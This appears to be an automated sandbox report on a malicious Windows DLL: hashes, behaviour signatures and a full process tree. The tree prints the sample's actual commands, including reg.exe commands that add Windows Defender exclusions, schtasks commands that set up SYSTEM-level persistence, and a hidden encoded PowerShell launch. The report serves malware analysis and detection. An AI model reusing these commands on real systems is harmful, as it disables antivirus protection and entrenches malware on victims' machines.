Analysis

  • max time kernel
    70s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    08-11-2020 18:18

General

  • Target

    1a879ef8228e2134225dcdb93dad47226ea1692ff70bd7d190b6b51cb42d3e26.dll

  • Size

    304KB

  • MD5

    f1e0baa123916ce237caee78536c75be

  • SHA1

    3a24715b0a790836eb0323e0b2ee4663f8f759c2

  • SHA256

    1a879ef8228e2134225dcdb93dad47226ea1692ff70bd7d190b6b51cb42d3e26

  • SHA512

    721e0d3c53ba72cf9bb9470f5bad195c4d22503470ab0cf9a1019099bdc30a90451b01f2efc7e660eec0bd3114c20d44621e2ecb3148b6b5eda2c1dd14e2e849

Malware Config

Signatures

  • Registers COM server for autorun 1 TTPs
  • Windows security bypass 2 TTPs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Installs/modifies Browser Helper Object 2 TTPs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • Drops file in System32 directory 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 20 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\1a879ef8228e2134225dcdb93dad47226ea1692ff70bd7d190b6b51cb42d3e26.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1876
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\1a879ef8228e2134225dcdb93dad47226ea1692ff70bd7d190b6b51cb42d3e26.dll,#1
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1132
      • C:\Users\Admin\AppData\Local\Temp\XDiMVUwYizJKBFrs\nPeHffteYySCvLPa.exe
        "C:\Users\Admin\AppData\Local\Temp\XDiMVUwYizJKBFrs\nPeHffteYySCvLPa.exe" /S
        3⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Drops file in Program Files directory
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:824
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "gNirhxbcT" /SC once /ST 05:39:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
          4⤵
          • Creates scheduled task(s)
          PID:1540
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /run /I /tn "gNirhxbcT"
          4⤵
            PID:668
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /DELETE /F /TN "gNirhxbcT"
            4⤵
              PID:1188
            • C:\Windows\SysWOW64\cmd.exe
              cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:32
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:996
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:32
                5⤵
                  PID:1648
              • C:\Windows\SysWOW64\cmd.exe
                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:64
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:308
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:64
                  5⤵
                    PID:904
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:32
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:972
                  • C:\Windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:32
                    5⤵
                      PID:936
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:64
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1540
                    • C:\Windows\SysWOW64\reg.exe
                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:64
                      5⤵
                        PID:1036
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /C copy nul "C:\Windows\Temp\mXZOChzNWSbPIDPW\ToHdTqvg\KgMrcGGPuAWwFXOa.wsf"
                      4⤵
                        PID:668
                      • C:\Windows\SysWOW64\wscript.exe
                        wscript "C:\Windows\Temp\mXZOChzNWSbPIDPW\ToHdTqvg\KgMrcGGPuAWwFXOa.wsf"
                        4⤵
                          PID:780
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BsZkTgYBU" /t REG_DWORD /d 0 /reg:32
                            5⤵
                              PID:1632
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BsZkTgYBU" /t REG_DWORD /d 0 /reg:64
                              5⤵
                                PID:1388
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzYifeKYfmykC" /t REG_DWORD /d 0 /reg:32
                                5⤵
                                  PID:616
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzYifeKYfmykC" /t REG_DWORD /d 0 /reg:64
                                  5⤵
                                    PID:1608
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HJbvTEnmUxKU2" /t REG_DWORD /d 0 /reg:32
                                    5⤵
                                      PID:1756
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HJbvTEnmUxKU2" /t REG_DWORD /d 0 /reg:64
                                      5⤵
                                        PID:436
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjkjItfMxIE" /t REG_DWORD /d 0 /reg:32
                                        5⤵
                                          PID:1544
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjkjItfMxIE" /t REG_DWORD /d 0 /reg:64
                                          5⤵
                                            PID:1708
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR" /t REG_DWORD /d 0 /reg:32
                                            5⤵
                                              PID:608
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR" /t REG_DWORD /d 0 /reg:64
                                              5⤵
                                                PID:1848
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oJCzsrkBUUUn" /t REG_DWORD /d 0 /reg:32
                                                5⤵
                                                  PID:968
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oJCzsrkBUUUn" /t REG_DWORD /d 0 /reg:64
                                                  5⤵
                                                    PID:2040
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ehtkUBLERmscXYVB" /t REG_DWORD /d 0 /reg:32
                                                    5⤵
                                                      PID:1852
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ehtkUBLERmscXYVB" /t REG_DWORD /d 0 /reg:64
                                                      5⤵
                                                        PID:1976
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\IWAenyPBsptMo" /t REG_DWORD /d 0 /reg:32
                                                        5⤵
                                                          PID:1372
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\IWAenyPBsptMo" /t REG_DWORD /d 0 /reg:64
                                                          5⤵
                                                            PID:1880
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ" /t REG_DWORD /d 0 /reg:32
                                                            5⤵
                                                              PID:1264
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ" /t REG_DWORD /d 0 /reg:64
                                                              5⤵
                                                                PID:1920
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:32
                                                                5⤵
                                                                  PID:1260
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:64
                                                                  5⤵
                                                                    PID:940
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BsZkTgYBU" /t REG_DWORD /d 0 /reg:32
                                                                    5⤵
                                                                      PID:1156
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BsZkTgYBU" /t REG_DWORD /d 0 /reg:64
                                                                      5⤵
                                                                        PID:664
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzYifeKYfmykC" /t REG_DWORD /d 0 /reg:32
                                                                        5⤵
                                                                          PID:1112
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzYifeKYfmykC" /t REG_DWORD /d 0 /reg:64
                                                                          5⤵
                                                                            PID:812
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HJbvTEnmUxKU2" /t REG_DWORD /d 0 /reg:32
                                                                            5⤵
                                                                              PID:1632
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HJbvTEnmUxKU2" /t REG_DWORD /d 0 /reg:64
                                                                              5⤵
                                                                                PID:744
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjkjItfMxIE" /t REG_DWORD /d 0 /reg:32
                                                                                5⤵
                                                                                  PID:1064
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjkjItfMxIE" /t REG_DWORD /d 0 /reg:64
                                                                                  5⤵
                                                                                    PID:828
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR" /t REG_DWORD /d 0 /reg:32
                                                                                    5⤵
                                                                                      PID:1344
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR" /t REG_DWORD /d 0 /reg:64
                                                                                      5⤵
                                                                                        PID:1652
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oJCzsrkBUUUn" /t REG_DWORD /d 0 /reg:32
                                                                                        5⤵
                                                                                          PID:904
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oJCzsrkBUUUn" /t REG_DWORD /d 0 /reg:64
                                                                                          5⤵
                                                                                            PID:1296
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ehtkUBLERmscXYVB" /t REG_DWORD /d 0 /reg:32
                                                                                            5⤵
                                                                                              PID:548
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ehtkUBLERmscXYVB" /t REG_DWORD /d 0 /reg:64
                                                                                              5⤵
                                                                                                PID:1672
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\IWAenyPBsptMo" /t REG_DWORD /d 0 /reg:32
                                                                                                5⤵
                                                                                                  PID:1848
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\IWAenyPBsptMo" /t REG_DWORD /d 0 /reg:64
                                                                                                  5⤵
                                                                                                    PID:1400
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ" /t REG_DWORD /d 0 /reg:32
                                                                                                    5⤵
                                                                                                      PID:888
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ" /t REG_DWORD /d 0 /reg:64
                                                                                                      5⤵
                                                                                                        PID:304
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:32
                                                                                                        5⤵
                                                                                                          PID:1308
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:64
                                                                                                          5⤵
                                                                                                            PID:436
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /END /TN "GOHuTEzoowDRCugrT"
                                                                                                          4⤵
                                                                                                            PID:1264
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /DELETE /F /TN "GOHuTEzoowDRCugrT"
                                                                                                            4⤵
                                                                                                              PID:996
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /END /TN "GOHuTEzoowDRCugrT2"
                                                                                                              4⤵
                                                                                                                PID:608
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /DELETE /F /TN "GOHuTEzoowDRCugrT2"
                                                                                                                4⤵
                                                                                                                  PID:788
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /END /TN "IZejQZgJAzccrSKMR"
                                                                                                                  4⤵
                                                                                                                    PID:668
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /DELETE /F /TN "IZejQZgJAzccrSKMR"
                                                                                                                    4⤵
                                                                                                                      PID:1984
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /END /TN "IZejQZgJAzccrSKMR2"
                                                                                                                      4⤵
                                                                                                                        PID:1672
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /DELETE /F /TN "IZejQZgJAzccrSKMR2"
                                                                                                                        4⤵
                                                                                                                          PID:1160
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /END /TN "aEUAiKTJppKmHMxMERr"
                                                                                                                          4⤵
                                                                                                                            PID:860
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /DELETE /F /TN "aEUAiKTJppKmHMxMERr"
                                                                                                                            4⤵
                                                                                                                              PID:1532
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              schtasks /END /TN "aEUAiKTJppKmHMxMERr2"
                                                                                                                              4⤵
                                                                                                                                PID:1368
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                schtasks /DELETE /F /TN "aEUAiKTJppKmHMxMERr2"
                                                                                                                                4⤵
                                                                                                                                  PID:2024
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /END /TN "OofpducfGPaQjeebuuX"
                                                                                                                                  4⤵
                                                                                                                                    PID:1764
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /DELETE /F /TN "OofpducfGPaQjeebuuX"
                                                                                                                                    4⤵
                                                                                                                                      PID:1348
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /END /TN "OofpducfGPaQjeebuuX2"
                                                                                                                                      4⤵
                                                                                                                                        PID:316
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /DELETE /F /TN "OofpducfGPaQjeebuuX2"
                                                                                                                                        4⤵
                                                                                                                                          PID:1260
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BsZkTgYBU\QqGRHI.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "skPkswxjkHVnnFn" /V1 /F
                                                                                                                                          4⤵
                                                                                                                                          • Drops file in Windows directory
                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                          PID:1704
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /END /TN "PdYtKThMMGtdGak"
                                                                                                                                          4⤵
                                                                                                                                            PID:1540
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /DELETE /F /TN "PdYtKThMMGtdGak"
                                                                                                                                            4⤵
                                                                                                                                              PID:968
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /END /TN "PdYtKThMMGtdGak2"
                                                                                                                                              4⤵
                                                                                                                                                PID:740
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /DELETE /F /TN "PdYtKThMMGtdGak2"
                                                                                                                                                4⤵
                                                                                                                                                  PID:1020
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /END /TN "KfUZRjbSKGVXWq"
                                                                                                                                                  4⤵
                                                                                                                                                    PID:1848
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /DELETE /F /TN "KfUZRjbSKGVXWq"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:1400
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /END /TN "jJUlnnVqTkofc"
                                                                                                                                                      4⤵
                                                                                                                                                        PID:744
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /DELETE /F /TN "jJUlnnVqTkofc"
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1324
                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          schtasks /END /TN "jJUlnnVqTkofc2"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:1320
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /DELETE /F /TN "jJUlnnVqTkofc2"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:792
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /CREATE /TN "skPkswxjkHVnnFn2" /F /xml "C:\Program Files (x86)\BsZkTgYBU\ysWCLVm.xml" /RU "SYSTEM"
                                                                                                                                                              4⤵
                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                              PID:904
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /END /TN "skPkswxjkHVnnFn"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:1296
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /DELETE /F /TN "skPkswxjkHVnnFn"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:1488
                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                  schtasks /CREATE /TN "EktCWFQgIFwHAp" /F /xml "C:\Program Files (x86)\HJbvTEnmUxKU2\vlAJldP.xml" /RU "SYSTEM"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                  PID:616
                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                  schtasks /CREATE /TN "VkpVyrVlAWRij2" /F /xml "C:\ProgramData\ehtkUBLERmscXYVB\hqzsGty.xml" /RU "SYSTEM"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                  PID:1020
                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                  schtasks /CREATE /TN "IZejQZgJAzccrSKMR2" /F /xml "C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR\HOOCTKh.xml" /RU "SYSTEM"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                  PID:1852
                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                  schtasks /CREATE /TN "OofpducfGPaQjeebuuX2" /F /xml "C:\Program Files (x86)\CzYifeKYfmykC\vASYnsA.xml" /RU "SYSTEM"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                  PID:1400
                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                  schtasks /CREATE /TN "spuADyNgCNhT" /SC once /ST 06:54:57 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ\xOmHDUPj\dLVvBvq.exe\" fD /S"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                  PID:1368
                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                  schtasks /run /I /tn "spuADyNgCNhT"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:2024
                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                    schtasks /END /TN "spuADyNgCNhT"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:904
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      schtasks /DELETE /F /TN "spuADyNgCNhT"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:1540
                                                                                                                                                                • C:\Windows\system32\taskeng.exe
                                                                                                                                                                  taskeng.exe {3B3581A1-C236-4684-BA9A-46337D80A304} S-1-5-21-293278959-2699126792-324916226-1000:TUICJFPF\Admin:Interactive:[1]
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                  PID:1688
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                    PID:980
                                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:1980
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ\xOmHDUPj\dLVvBvq.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ\xOmHDUPj\dLVvBvq.exe fD /S
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                      PID:1548
